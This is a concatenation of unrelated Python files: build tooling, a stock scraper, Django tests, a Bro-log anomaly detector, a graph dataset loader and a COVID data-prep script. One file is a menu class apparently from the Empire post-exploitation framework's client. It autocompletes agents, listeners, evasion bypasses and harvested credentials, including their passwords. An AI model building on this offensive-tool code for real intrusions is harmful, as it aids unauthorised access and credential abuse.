    parser.add_argument('--mem-heap', metavar='SIZE', action='store', type=int, default=512,
                        help='size of memory heap, in kilobytes (default: %(default)s)')
    parser.add_argument('--profile', metavar='FILE', action='store', default=DEFAULT_PROFILE,
                        help='specify profile file (default: %(default)s)')
    parser.add_argument('--snapshot-exec', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
                        help='enable executing snapshot files (%(choices)s; default: %(default)s)')
    parser.add_argument('--snapshot-save', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
                        help='enable saving snapshot files (%(choices)s; default: %(default)s)')
    parser.add_argument('--system-allocator', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
                        help='enable system allocator (%(choices)s; default: %(default)s)')
    parser.add_argument('--static-link', metavar='X', choices=['ON', 'OFF'], default='ON', type=str.upper,
                        help='enable static linking of binaries (%(choices)s; default: %(default)s)')
    parser.add_argument('--strip', metavar='X', choices=['ON', 'OFF'], default='ON', type=str.upper,
                        help='strip release binaries (%(choices)s; default: %(default)s)')
    parser.add_argument('--toolchain', metavar='FILE', action='store', default=default_toolchain(),
                        help='add toolchain file (default: %(default)s)')
    parser.add_argument('--unittests', action='store_const', const='ON', default='OFF',
                        help='build unittests')
    parser.add_argument('-v', '--verbose', action='store_const', const='ON', default='OFF',
                        help='increase verbosity')
    parser.add_argument('--vm-exec-stop', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
                        help='enable VM execution stopping (%(choices)s; default: %(default)s)')
    # Developer-only options; help text is suppressed without --devhelp.
    devgroup = parser.add_argument_group('developer options')
    devgroup.add_argument('--jerry-cmdline-test', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
                          help=devhelp('build test version of the jerry command line tool '
                                       '(%(choices)s; default: %(default)s)'))
    devgroup.add_argument('--link-map', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
                          help=devhelp('enable the generation of a link map file for jerry command line tool '
                                       '(%(choices)s; default: %(default)s)'))
    devgroup.add_argument('--mem-stats', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
                          help=devhelp('enable memory statistics (%(choices)s; default: %(default)s)'))
    devgroup.add_argument('--mem-stress-test', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
                          help=devhelp('enable mem-stress test (%(choices)s; default: %(default)s)'))
    devgroup.add_argument('--regexp-strict-mode', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
                          help=devhelp('enable regexp strict mode (%(choices)s; default: %(default)s)'))
    devgroup.add_argument('--show-opcodes', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
                          help=devhelp('enable parser byte-code dumps (%(choices)s; default: %(default)s)'))
    devgroup.add_argument('--show-regexp-opcodes', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
                          help=devhelp('enable regexp byte-code dumps (%(choices)s; default: %(default)s)'))
    devgroup.add_argument('--valgrind', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
                          help=devhelp('enable Valgrind support (%(choices)s; default: %(default)s)'))
    devgroup.add_argument('--valgrind-freya', metavar='X', choices=['ON', 'OFF'], default='OFF', type=str.upper,
                          help=devhelp('enable Valgrind-Freya support (%(choices)s; default: %(default)s)'))
    arguments = parser.parse_args(args)
    if arguments.devhelp:
        # --devhelp prints the full (unsuppressed) help and exits.
        parser.print_help()
        sys.exit(0)
    return arguments
def generate_build_options(arguments):
    """Translate the parsed command-line arguments into CMake cache definitions.

    :param arguments: namespace produced by get_arguments()
    :return: list of '-D<NAME>=<value>' strings, followed by any raw
             parameters the user passed via --cmake-param
    """
    defines = [
        ('ENABLE_ALL_IN_ONE', arguments.all_in_one),
        ('CMAKE_BUILD_TYPE', arguments.build_type),
        ('EXTERNAL_COMPILE_FLAGS', ' '.join(arguments.compile_flag)),
        ('FEATURE_CPOINTER_32_BIT', arguments.cpointer_32bit),
        ('FEATURE_ERROR_MESSAGES', arguments.error_messages),
        ('JERRY_CMDLINE', arguments.jerry_cmdline),
        ('JERRY_CMDLINE_TEST', arguments.jerry_cmdline_test),
        ('JERRY_CMDLINE_SNAPSHOT', arguments.jerry_cmdline_snapshot),
        ('JERRY_PORT_DEFAULT', arguments.jerry_port_default),
        ('JERRY_EXT', arguments.jerry_ext),
        ('JERRY_LIBC', arguments.jerry_libc),
        ('JERRY_LIBM', arguments.jerry_libm),
        ('FEATURE_JS_PARSER', arguments.js_parser),
        ('EXTERNAL_LINK_LIBS', ' '.join(arguments.link_lib)),
        ('EXTERNAL_LINKER_FLAGS', ' '.join(arguments.linker_flag)),
        ('ENABLE_LTO', arguments.lto),
        ('MEM_HEAP_SIZE_KB', arguments.mem_heap),
        ('FEATURE_PROFILE', arguments.profile),
        ('FEATURE_DEBUGGER', arguments.jerry_debugger),
        ('FEATURE_EXTERNAL_CONTEXT', arguments.external_context),
        ('FEATURE_SNAPSHOT_EXEC', arguments.snapshot_exec),
        ('FEATURE_SNAPSHOT_SAVE', arguments.snapshot_save),
        ('FEATURE_SYSTEM_ALLOCATOR', arguments.system_allocator),
        ('ENABLE_STATIC_LINK', arguments.static_link),
        ('ENABLE_STRIP', arguments.strip),
        ('FEATURE_VM_EXEC_STOP', arguments.vm_exec_stop),
    ]
    # a toolchain file is only passed through when one was requested
    if arguments.toolchain:
        defines.append(('CMAKE_TOOLCHAIN_FILE', arguments.toolchain))
    defines.extend([
        ('UNITTESTS', arguments.unittests),
        ('DOCTESTS', arguments.doctests),
        ('CMAKE_VERBOSE_MAKEFILE', arguments.verbose),
        # developer options
        ('ENABLE_LINK_MAP', arguments.link_map),
        ('FEATURE_MEM_STATS', arguments.mem_stats),
        ('FEATURE_MEM_STRESS_TEST', arguments.mem_stress_test),
        ('FEATURE_PARSER_DUMP', arguments.show_opcodes),
        ('FEATURE_REGEXP_STRICT_MODE', arguments.regexp_strict_mode),
        ('FEATURE_REGEXP_DUMP', arguments.show_regexp_opcodes),
        ('FEATURE_VALGRIND', arguments.valgrind),
        ('FEATURE_VALGRIND_FREYA', arguments.valgrind_freya),
    ])
    build_options = ['-D%s=%s' % (name, value) for name, value in defines]
    # raw CMake parameters are forwarded verbatim, after all generated defines
    build_options.extend(arguments.cmake_param)
    return build_options
def configure_output_dir(arguments):
    """Normalize, optionally clean, and create the build directory.

    Mutates arguments.builddir in place so later steps see an absolute path.
    """
    # resolve relative build dirs against the project root
    if not os.path.isabs(arguments.builddir):
        arguments.builddir = os.path.join(settings.PROJECT_DIR, arguments.builddir)
    build_dir = arguments.builddir
    # --clean wipes any previous build output before reconfiguring
    if arguments.clean and os.path.exists(build_dir):
        shutil.rmtree(build_dir)
    if not os.path.exists(build_dir):
        os.makedirs(build_dir)
def configure_build(arguments):
    """Prepare the output directory and run the CMake configure step.

    :return: cmake's exit status (0 on success)
    """
    configure_output_dir(arguments)
    cmake_cmd = ['cmake', '-B' + arguments.builddir, '-H' + settings.PROJECT_DIR]
    cmake_cmd.extend(generate_build_options(arguments))
    return subprocess.call(cmake_cmd)
def build_jerry(arguments):
    """Run make on the configured build directory; return make's exit status."""
    make_cmd = ['make', '--no-print-directory', '-j', str(arguments.jobs), '-C', arguments.builddir]
    return subprocess.call(make_cmd)
def print_result(ret):
    """Print a banner-framed summary of the build's exit status *ret*."""
    separator = '=' * 30
    print(separator)
    # any non-zero status counts as a failure
    message = 'Build failed with exit code: %s' % (ret) if ret else 'Build succeeded!'
    print(message)
    print(separator)
def main():
    """Entry point: parse arguments, configure, build, report and exit."""
    arguments = get_arguments()
    status = configure_build(arguments)
    # only attempt the build if configuration succeeded
    if status == 0:
        status = build_jerry(arguments)
    print_result(status)
    sys.exit(status)
# Run the build when invoked directly; the module can also be imported for its helpers.
if __name__ == "__main__":
    main()
|
# -*- coding: utf-8 -*-
import scrapy
import pandas as pd
from basic1.items import Basic1Item
# stock50.csv: Big5-encoded CSV with no header row; column 0 holds the stock codes.
df = pd.read_csv("stock50.csv", encoding="big5", header=None)
class B1Spider(scrapy.Spider):
    """Scrapes five quarterly ratio fields for every stock code in stock50.csv."""
    name = 'b1'
    allowed_domains = ['tw.stock.yahoo.com']
    start_urls = []
    codes = df[0]
    # one company page per stock code taken from the csv's first column
    for stock_code in codes:
        start_urls.append("https://tw.stock.yahoo.com/d/s/company_" + str(stock_code) + ".html")
    def parse(self, response):
        """Extract the five ratio cells from the second table of the page."""
        item = Basic1Item()
        # the 4-digit stock code sits just before '.html' in the page URL
        item['code'] = response.url[-9:-5]
        cells = response.xpath("//table[2]//tr[position()>=2 and position() <=6]/td[2]//text()").extract()
        item['qgr'] = cells[0]
        item['qopr'] = cells[1]
        item['qnir'] = cells[2]
        item['qroa'] = cells[3]
        item['qroe'] = cells[4]
        yield item
|
class OrderUpdateReasonEnum:
    """Integer reason codes attached to order-update messages.

    NOTE(review): the numeric values look like part of an external message
    protocol — do not renumber without confirming against the producer.
    """
    ORDER_UPDATE_REASON_UNSET = 0  # no reason supplied / placeholder
    OPEN_ORDERS_REQUEST_RESPONSE = 1  # update sent in reply to an open-orders request
    NEW_ORDER_ACCEPTED = 2  # a newly submitted order was accepted
    GENERAL_ORDER_UPDATE = 3  # unspecified state refresh
    ORDER_FILLED = 4  # order completely filled
    ORDER_FILLED_PARTIALLY = 5  # order partially filled
    ORDER_CANCELED = 6  # order canceled
    ORDER_CANCEL_REPLACE_COMPLETE = 7  # cancel/replace finished
    NEW_ORDER_REJECTED = 8  # a newly submitted order was rejected
    ORDER_CANCEL_REJECTED = 9  # a cancel request was rejected
    ORDER_CANCEL_REPLACE_REJECTED = 10  # a cancel/replace request was rejected
|
"""FileTailer Python Class"""
from __future__ import print_function
import os
import sys
import argparse
import time
import math
from collections import Counter
# Third Party Imports
import pandas as pd
from sklearn.ensemble import IsolationForest
from sklearn.cluster import KMeans
# Local imports
from bat import bro_log_reader, live_simulator
from bat import dataframe_to_matrix, dataframe_cache
if __name__ == '__main__':
    # Example to show the dataframe cache functionality on streaming data
    pd.set_option('display.width', 200)
    # Collect args from the command line
    parser = argparse.ArgumentParser()
    parser.add_argument('bro_log', type=str, help='Specify a bro log to run BroLogReader test on')
    args, commands = parser.parse_known_args()
    # Check for unknown args
    if commands:
        print('Unrecognized args: %s' % commands)
        sys.exit(1)
    # File may have a tilde in it
    if args.bro_log:
        args.bro_log = os.path.expanduser(args.bro_log)
    # Sanity check for either http or dns log; pick the feature set per log type
    if 'http' in args.bro_log:
        log_type = 'http'
        features = ['id.resp_p', 'method', 'resp_mime_types', 'request_body_len']
    elif 'dns' in args.bro_log:
        log_type = 'dns'
        features = ['Z', 'rejected', 'proto', 'query', 'qclass_name', 'qtype_name',
                    'rcode_name', 'query_length', 'id.resp_p']
    else:
        print('This example only works with Bro with http.log or dns.log files..')
        sys.exit(1)
    # Create a Bro log reader
    print('Opening Data File: {:s}'.format(args.bro_log))
    reader = bro_log_reader.BroLogReader(args.bro_log, tail=True)
    # OR you could create a live simulator to test it out on a static log file
    # reader = live_simulator.LiveSimulator(args.bro_log)
    # Create a Dataframe Cache
    df_cache = dataframe_cache.DataFrameCache(max_cache_time=600)  # 10 minute cache
    # Add each new row into the cache
    time_delta = 30
    timer = time.time() + time_delta
    for row in reader.readrows():
        df_cache.add_row(row)
        # Every 30 seconds grab the dataframe from the cache
        if time.time() > timer:
            timer = time.time() + time_delta
            # Get the windowed dataframe (10 minute window)
            bro_df = df_cache.dataframe()
            # BUG FIX: `features` was previously overwritten here with the
            # dns-specific list, which broke the http code path chosen above
            # (and `query_length` was computed on http frames that have no
            # 'query' column). Only derive query_length for dns logs.
            if log_type == 'dns':
                bro_df['query_length'] = bro_df['query'].str.len()
            # Use the bat DataframeToMatrix class
            to_matrix = dataframe_to_matrix.DataFrameToMatrix()
            bro_matrix = to_matrix.fit_transform(bro_df[features])
            print(bro_matrix.shape)
            # Print out the range of the daterange and some stats
            print('DataFrame TimeRange: {:s} --> {:s}'.format(str(bro_df['ts'].min()), str(bro_df['ts'].max())))
            # Train/fit and Predict anomalous instances using the Isolation Forest model
            odd_clf = IsolationForest(contamination=0.01)  # Marking 1% as odd
            odd_clf.fit(bro_matrix)
            # New dataframe with only the predicted-anomalous rows.
            # .copy() avoids pandas SettingWithCopy issues when we add the
            # 'cluster' column below.
            odd_df = bro_df[odd_clf.predict(bro_matrix) == -1].copy()
            # Explore the odd observations with KMeans; skip when nothing was flagged
            if len(odd_df) > 0:
                num_clusters = min(len(odd_df), 10)  # 10 clusters unless we have less than 10 observations
                odd_matrix = to_matrix.fit_transform(odd_df[features])
                odd_df['cluster'] = KMeans(n_clusters=num_clusters).fit_predict(odd_matrix)
                print(odd_matrix.shape)
                # Now group the dataframe by cluster
                cluster_groups = odd_df.groupby('cluster')
                # Now print out the details for each cluster
                show_fields = ['id.orig_h', 'id.resp_h'] + features
                print('<<< Outliers Detected! >>>')
                for key, group in cluster_groups:
                    print('\nCluster {:d}: {:d} observations'.format(key, len(group)))
                    print(group[show_fields].head())
|
import datetime
from django.utils import timezone
from django.test import TestCase
from django.urls import reverse
from .models import Account
# Create your tests here.
class AccountMethodTests(TestCase):
    """Unit tests for Account.was_added_recently()."""
    def test_was_added_recently_with_future_account(self):
        """
        was_added_recently() should return False for accounts whose
        date_added lies in the future.
        """
        future_time = timezone.now() + datetime.timedelta(days=30)
        account = Account(date_added=future_time)
        self.assertIs(account.was_added_recently(), False)
    def test_was_added_recently_with_old_account(self):
        """
        was_added_recently() should return False for accounts added more
        than a day ago.
        """
        old_time = timezone.now() - datetime.timedelta(days=30)
        account = Account(date_added=old_time)
        self.assertIs(account.was_added_recently(), False)
    def test_was_added_recently_with_recent_account(self):
        """
        was_added_recently() should return True for accounts added within
        the last day.
        """
        recent_time = timezone.now() - datetime.timedelta(hours=1)
        account = Account(date_added=recent_time)
        self.assertIs(account.was_added_recently(), True)
def create_account(account_name, days):
    """
    Create an Account named `account_name`, dated `days` from now
    (negative for accounts added in the past, positive for accounts
    that have yet to be added).
    """
    date_added = timezone.now() + datetime.timedelta(days=days)
    return Account.objects.create(account_name=account_name, date_added=date_added)
class AccountViewTests(TestCase):
    """Tests for the prospecting index view's filtering of accounts."""
    def test_index_view_with_no_accounts(self):
        """
        If no accounts exist, an appropriate message should be displayed.
        """
        response = self.client.get(reverse('prospecting:index'))
        self.assertEqual(response.status_code, 200)
        self.assertContains(response, "No accounts have been added.")
        self.assertQuerysetEqual(response.context['latest_account_list'], [])
    def test_index_view_with_a_past_account(self):
        """
        Accounts with a date_added in the past should be displayed on the index
        page.
        """
        create_account(account_name="Past account.", days=-30)
        response = self.client.get(reverse('prospecting:index'))
        self.assertQuerysetEqual(
            response.context['latest_account_list'], ['<Account: Past account.>']
        )
    def test_index_view_with_a_future_account(self):
        """
        Accounts with a date_added in the future should not be displayed on the
        index page.
        """
        create_account(account_name="Future account.", days=30)
        response = self.client.get(reverse('prospecting:index'))
        self.assertContains(response, "No accounts have been added.")
        self.assertQuerysetEqual(response.context['latest_account_list'], [])
    def test_index_view_with_future_account_and_past_account(self):
        """Even if both past and future accounts exist, only past accounts
        should be displayed.
        """
        create_account(account_name="Past account.", days=-30)
        create_account(account_name="Future account.", days=30)
        # BUG FIX: this previously reversed 'polling:index', a different app
        # namespace; every other test in this class targets 'prospecting'.
        response = self.client.get(reverse('prospecting:index'))
        self.assertQuerysetEqual(
            response.context['latest_account_list'], ['<Account: Past account.>']
        )
    def test_index_view_with_two_past_accounts(self):
        """
        The accounts index page may display multiple accounts.
        """
        create_account(account_name="Past account 1.", days=-30)
        create_account(account_name="Past account 2.", days=-5)
        response = self.client.get(reverse('prospecting:index'))
        self.assertQuerysetEqual(
            response.context['latest_account_list'], ['<Account: Past account 2.>', '<Account: Past account 1.>']
        )
class AccountIndexDetailTest(TestCase):
    """Tests for the prospecting detail view's handling of account dates."""
    def test_detail_view_with_a_future_account(self):
        """
        The detail view of an account dated in the future should return a
        404 not found.
        """
        account = create_account(account_name='Future account.', days=5)
        detail_url = reverse('prospecting:detail', args=(account.id,))
        self.assertEqual(self.client.get(detail_url).status_code, 404)
    def test_detail_view_with_a_past_account(self):
        """
        The detail view of an account dated in the past should display the
        account's name.
        """
        account = create_account(account_name='Past Account.', days=-5)
        detail_url = reverse('prospecting:detail', args=(account.id,))
        self.assertContains(self.client.get(detail_url), account.account_name)
|
from typing import List
from prompt_toolkit import HTML
from prompt_toolkit.completion import Completion
from empire.client.src.EmpireCliState import state
from empire.client.src.menus.Menu import Menu
from empire.client.src.utils import print_util, table_util
from empire.client.src.utils.autocomplete_util import (
current_files,
filtered_search_list,
position_util,
where_am_i,
)
from empire.client.src.utils.cli_util import command
class UseMenu(Menu):
    """
    A base menu object that can be used when needing the typical "use" behavior,
    such as set, unset, and info: a record is selected and its options edited.
    """
    def __init__(self, display_name="", selected="", record=None, record_options=None):
        """
        :param display_name: See Menu
        :param selected: See Menu
        :param record: The record object (dict of display fields used by `info`)
        :param record_options: The options to configure for the current record
            (mapping of option name -> {"Value", "Required", "Description", ...})
        """
        super().__init__(display_name=display_name, selected=selected)
        self.record = record
        self.record_options = record_options
    def get_completions(self, document, complete_event, cmd_line, word_before_cursor):
        """
        Adds autocomplete for the set and unset methods and defers to the base Menu when trying to invoke
        global commands (position 1 commands).
        """
        # Position 2 of "set"/"unset": complete the option name itself.
        if cmd_line[0] in ["set", "unset"] and position_util(
            cmd_line, 2, word_before_cursor
        ):
            for option in filtered_search_list(word_before_cursor, self.record_options):
                yield Completion(option, start_position=-len(word_before_cursor))
        # "set bypasses ...": multi-valued option — keep suggesting bypasses
        # that are not already on the command line, at any position.
        elif (
            cmd_line[0] == "set"
            and len(cmd_line) > 1
            and cmd_line[1] == "bypasses"
            and "bypasses" in map(lambda x: x.lower(), self.record_options.keys())
            and position_util(
                cmd_line, where_am_i(cmd_line, word_before_cursor), word_before_cursor
            )
        ):
            for suggested_value in filtered_search_list(
                word_before_cursor, state.bypasses
            ):
                if suggested_value not in cmd_line:
                    yield Completion(
                        suggested_value, start_position=-len(word_before_cursor)
                    )
        # Position 3 of "set": complete the option's value, with dedicated
        # completion sources for well-known option names.
        elif cmd_line[0] == "set" and position_util(cmd_line, 3, word_before_cursor):
            if len(cmd_line) > 1 and cmd_line[1] == "listener":
                for listener in filtered_search_list(
                    word_before_cursor, state.listeners.keys()
                ):
                    yield Completion(listener, start_position=-len(word_before_cursor))
            if len(cmd_line) > 1 and cmd_line[1] == "profile":
                for profile in filtered_search_list(
                    word_before_cursor, state.profiles.keys()
                ):
                    yield Completion(profile, start_position=-len(word_before_cursor))
            if len(cmd_line) > 1 and cmd_line[1] == "agent":
                for agent in filtered_search_list(
                    word_before_cursor, state.agents.keys()
                ):
                    yield Completion(agent, start_position=-len(word_before_cursor))
            if len(cmd_line) > 1 and cmd_line[1] == "file":
                if len(cmd_line) > 2 and cmd_line[2] == "-p":
                    # NOTE(review): yields the raw return of state.search_files()
                    # as a single completion — presumably a path picked via a
                    # file-selection dialog; confirm.
                    yield Completion(
                        state.search_files(), start_position=-len(word_before_cursor)
                    )
                else:
                    # otherwise complete from the local downloads directory,
                    # displaying only the basename
                    for files in filtered_search_list(
                        word_before_cursor, current_files(state.directory["downloads"])
                    ):
                        yield Completion(
                            files,
                            display=files.split("/")[-1],
                            start_position=-len(word_before_cursor),
                        )
            if len(cmd_line) > 1 and cmd_line[1] == "credid":
                # show a truncated username/domain/password summary next to
                # each credential id
                for cred in filtered_search_list(
                    word_before_cursor, state.credentials.keys()
                ):
                    full = state.credentials[cred]
                    help_text = print_util.truncate(
                        f"{full.get('username', '')}, {full.get('domain', '')}, {full.get('password', '')}",
                        width=75,
                    )
                    yield Completion(
                        cred,
                        display=HTML(f"{full['ID']} <purple>({help_text})</purple>"),
                        start_position=-len(word_before_cursor),
                    )
            # generic fallback: any option may declare its own SuggestedValues
            if (
                len(cmd_line) > 1
                and len(self.suggested_values_for_option(cmd_line[1])) > 0
            ):
                for suggested_value in filtered_search_list(
                    word_before_cursor, self.suggested_values_for_option(cmd_line[1])
                ):
                    yield Completion(
                        suggested_value, start_position=-len(word_before_cursor)
                    )
        # Position 1: defer to the base Menu for global command completion.
        elif position_util(cmd_line, 1, word_before_cursor):
            yield from super().get_completions(
                document, complete_event, cmd_line, word_before_cursor
            )
    @command
    def set(self, key: str, value: str):
        """
        Set a field for the current record. If setting a File, provide -p for a file selection dialog.
        Usage: set <key> <value>
        """
        # The value is always sent with additional wrapping quotes due to parsing crap,
        # So we strip the first set of quotes (because there may be another set of quotes that are
        # meant to be sent to the api).
        if value.startswith('"') and value.endswith('"'):
            value = value[1:-1]
        if key in self.record_options:
            self.record_options[key]["Value"] = value
            print(print_util.color("[*] Set %s to %s" % (key, value)))
        else:
            print(print_util.color(f"Could not find field: {key}"))
    @command
    def unset(self, key: str):
        """
        Unset a record option (reset its value to the empty string).
        Usage: unset <key>
        """
        if key in self.record_options:
            self.record_options[key]["Value"] = ""
            print(print_util.color("[*] Unset %s" % key))
        else:
            print(print_util.color(f"Could not find field: {key}"))
    @command
    def options(self):
        """
        Print the current record options as a table.
        Usage: options
        """
        record_list = []
        for key, value in self.record_options.items():
            name = key
            record_value = print_util.text_wrap(value.get("Value", ""))
            required = print_util.text_wrap(value.get("Required", ""))
            description = print_util.text_wrap(value.get("Description", ""))
            record_list.append([name, record_value, required, description])
        # header row goes first
        record_list.insert(0, ["Name", "Value", "Required", "Description"])
        table_util.print_table(record_list, "Record Options")
    @command
    def info(self):
        """
        Print default info on the current record.
        Usage: info
        """
        record_list = []
        for key, values in self.record.items():
            # only a fixed subset of record fields is displayed
            if key in [
                "Name",
                "Author",
                "Comments",
                "Description",
                "Language",
                "Background",
                "NeedsAdmin",
                "OpsecSafe",
                "Techniques",
                "Software",
            ]:
                if isinstance(values, list):
                    if len(values) > 0 and values[0] != "":
                        for i, value in enumerate(values):
                            # technique ids are rendered as MITRE ATT&CK links
                            if key == "Techniques":
                                value = "http://attack.mitre.org/techniques/" + value
                            # the key label is printed only on the first row
                            if i == 0:
                                record_list.append(
                                    [
                                        print_util.color(key, "blue"),
                                        print_util.text_wrap(value, width=70),
                                    ]
                                )
                            else:
                                record_list.append(
                                    ["", print_util.text_wrap(value, width=70)]
                                )
                elif values != "":
                    if key == "Software":
                        values = "http://attack.mitre.org/software/" + values
                    record_list.append(
                        [
                            print_util.color(key, "blue"),
                            print_util.text_wrap(values, width=70),
                        ]
                    )
        table_util.print_table(
            record_list, "Record Info", colored_header=False, no_borders=True
        )
    def suggested_values_for_option(self, option: str) -> List[str]:
        # Case-insensitive lookup of an option's "SuggestedValues" list.
        # NOTE(review): keys are lower-cased but `option` itself is not, so a
        # mixed-case option name will never match — confirm callers always
        # pass lower-case names.
        try:
            lower = {k.lower(): v for k, v in self.record_options.items()}
            return lower.get(option, {}).get("SuggestedValues", [])
        except AttributeError:
            return []
|
from django.test import TestCase
from core.tests.utils import sample_user
from ..models import Tag
class TagModelTest(TestCase):
    def test_tag_str(self):
        """A tag's string representation should be its name."""
        new_tag = Tag.objects.create(user=sample_user(), name='Meat Lover')
        self.assertEqual(str(new_tag), new_tag.name)
|
from selenium.webdriver.common.by import By
class LoginLocators(object):
    """Selenium locator tuples (By strategy, selector) for the login page."""
    INPUT_USERNAME = (By.ID, 'user-name')  # username text field
    INPUT_PASSWORD = (By.ID, 'password')  # password text field
    BUTTON_LOGIN = (By.ID, 'login-button')  # submit button
    LABEL_MESSAGE = (By.XPATH, '//*[@id="login_button_container"]/div/form/h3')  # status/error label
|
import os, torch, numpy as np
from torch_geometric.data import InMemoryDataset, Data, download_url, extract_zip
import shutil
import networkx as nx
import pickle
class CyclesDataset(InMemoryDataset):
    """Graphs labeled by whether they contain a k-cycle ('has-kcycle').

    Downloads pre-generated pickles, splits them per graph size, and converts
    each networkx graph into a torch_geometric `Data` object.
    """
    url = 'https://drive.switch.ch/index.php/s/hv65hmY48GrRAoN/download'
    def __init__(self, root, train, k=8, n=50, proportion=1.0, n_samples=10000, transform=None, pre_transform=None, pre_filter=None):
        """
        :param root: dataset root directory
        :param train: True for the training split, False for the test split
        :param k: cycle length of the detection task
        :param n: graph size to load
        :param proportion: fraction of the training split to keep (test split
            is never subsampled)
        :param n_samples: samples per split encoded in the raw file names
        """
        self.train = train
        self.k, self.n, self.n_samples = k, n, n_samples
        self.s = 'train' if train else 'test'
        self.proportion = proportion
        super().__init__(root, transform, pre_transform, pre_filter)
        self.data, self.slices = torch.load(self.processed_paths[0])
    @property
    def raw_file_names(self):
        # per-split raw file written by build_dataset()
        return ['{}cycles_n{}_{}samples_{}.pt'.format(self.k, self.n, self.n_samples, self.s)]
    @property
    def processed_file_names(self):
        # proportion is part of the name so different subsample ratios don't collide
        return [f'processed_{self.k}cycles_n{self.n}_{self.n_samples}samples_{self.s}_{self.proportion}.pt']
    def download(self):
        # wipe any partial raw data, fetch the archive, then split it locally
        shutil.rmtree(self.raw_dir)
        path = download_url(self.url, self.raw_dir)
        extract_zip(path, self.raw_dir)
        self.build_dataset()
    def build_dataset(self):
        """ Given pickle files, split the dataset into one per value of n
        Run once before running the experiments. """
        # NOTE(review): n_samples is hard-coded to 10000 here regardless of
        # self.n_samples — confirm the raw pickles always use that size.
        n_samples = 10000
        for k in [4, 6, 8]:
            with open(os.path.join(self.raw_dir, f'datasets_kcycle_k={k}_nsamples={n_samples}.pickle'), 'rb') as f:
                datasets_params, datasets = pickle.load(f)
            # Split by graph size
            for params, dataset in zip(datasets_params, datasets):
                n = params['n']
                train, test = dataset[:n_samples], dataset[n_samples:]
                torch.save(train, os.path.join(self.raw_dir, f'{k}cycles_n{n}_{n_samples}samples_train.pt'))
                torch.save(test, os.path.join(self.raw_dir, f'{k}cycles_n{n}_{n_samples}samples_test.pt'))
    def process(self):
        # Read data into huge `Data` list.
        dataset = torch.load(os.path.join(self.raw_dir, f'{self.k}cycles_n{self.n}_{self.n_samples}samples_{self.s}.pt'))
        data_list = []
        for sample in dataset:
            graph, y, label = sample
            edge_list = nx.to_edgelist(graph)
            # store both edge directions so the resulting graph is undirected
            edges = [np.array([edge[0], edge[1]]) for edge in edge_list]
            edges2 = [np.array([edge[1], edge[0]]) for edge in edge_list]
            edge_index = torch.tensor(np.array(edges + edges2).T, dtype=torch.long)
            # constant node features; binary target 1 iff a k-cycle is present
            x = torch.ones(graph.number_of_nodes(), 1, dtype=torch.float)
            y = torch.tensor([1], dtype=torch.long) if label == 'has-kcycle' else torch.tensor([0], dtype=torch.long)
            data_list.append(Data(x=x, edge_index=edge_index, edge_attr=None, y=y))
        # Subsample the data (training split only)
        if self.train:
            all_data = len(data_list)
            to_select = int(all_data * self.proportion)
            print(to_select, "samples were selected")
            data_list = data_list[:to_select]
        if self.pre_filter is not None:
            data_list = [data for data in data_list if self.pre_filter(data)]
        if self.pre_transform is not None:
            data_list = [self.pre_transform(data) for data in data_list]
        data, slices = self.collate(data_list)
        torch.save((data, slices), self.processed_paths[0])
# Manual smoke test: constructing the test split triggers download/process as needed.
if __name__ == '__main__':
    print(CyclesDataset('data/CYCLE', False))
from pathlib import Path
from typing import Dict, Optional, Sequence, Tuple
import numpy as np
import pandas as pd
from etl import *
from epimargin.utils import cwd, days
if __name__ == '__main__':
    # working directories for inputs and outputs
    root = cwd()
    data = root/'data'
    figs = root/'figs'
    # load meta data for metro-state aggregations & filter to top 100 metro areas
    county_populations = load_us_county_data('covid_county_population_usafacts.csv')
    county_populations = county_populations[county_populations['county_name'] != 'Statewide Unallocated']
    metro_areas = load_metro_areas(data/'county_metro_state_walk.csv').rename(columns={'state_codes': 'state', 'county_fips': 'countyfips'})
    top_metros = get_top_metros(county_populations, metro_areas)
    top_metros = county_populations.merge(top_metros[['countyfips','cbsa_fips']], on='countyfips')
    top_metros = top_metros.groupby(['cbsa_fips', 'state']).apply(pop_prop_col)
    # composite key "<cbsa fips>_<state code>" used as the panel unit below
    top_metros['metro-state'] = top_metros['cbsa_fips'].astype(int).astype(str) + '_' + top_metros['state']
    # load county level daily case data
    case_df = load_us_county_data('covid_confirmed_usafacts.csv')
    county_case_ts = get_case_timeseries(case_df).merge(top_metros, on='countyfips', how='inner')
    # load county level google mobility data, and impute/drop missing data
    ## N.B parks_percent_change_from_baseline and transit_stations_percent_change_from_baseline still have a lot of missing --> drop these columns from analysis
    us_mobility = load_country_google_mobility('US').rename(columns={'sub_region_1': 'state_name', 'census_fips_code': 'countyfips'})
    county_mobility_ts = us_mobility[~(us_mobility['countyfips'].isna())].set_index(['countyfips', 'date'])
    county_mobility_ts = impute_missing_mobility(county_mobility_ts)
    county_mobility_imputed, lst_cnt = remain_county(county_mobility_ts.merge(county_populations[['countyfips','population']], on='countyfips'))
    # metro-state level aggregation
    metro_state_cases = pd.DataFrame(county_case_ts.groupby(['metro-state', 'date'])['daily_confirmed_cases'].sum())
    metro_state_mobility = metro_state_mobility_agg(county_mobility_imputed.merge(top_metros, on='countyfips', how='inner'))
    # load rt daily data
    rt_drop_cols = ['RR_pred_rtliveold', 'RR_CI_lower_rtliveold', 'RR_CI_upper_rtliveold']
    # NOTE(review): this csv name literally starts with '+' — confirm it
    # matches the file on disk and is not a typo.
    metro_state_rt = pd.read_csv(data/'+rt_estimates_comparison.csv', parse_dates=['date']).iloc[:,1:].rename(columns={'cbsa_fips_state':'metro-state'}).set_index(['metro-state','date'])
    metro_state_rt.drop(columns=rt_drop_cols, inplace=True)
    # create metro-state aggregated df
    metro_state_df = metro_state_mobility.join(metro_state_cases.join(metro_state_rt)).join(top_metros[['metro-state','state', 'cbsa_fips']].drop_duplicates().set_index('metro-state'))
    # add state level intervention dummies
    state_interventions = state_level_intervention_data(data/'COVID-19 US state policy database_08_03_2020.xlsx').reset_index().rename(columns={'STATE':'state_name'})
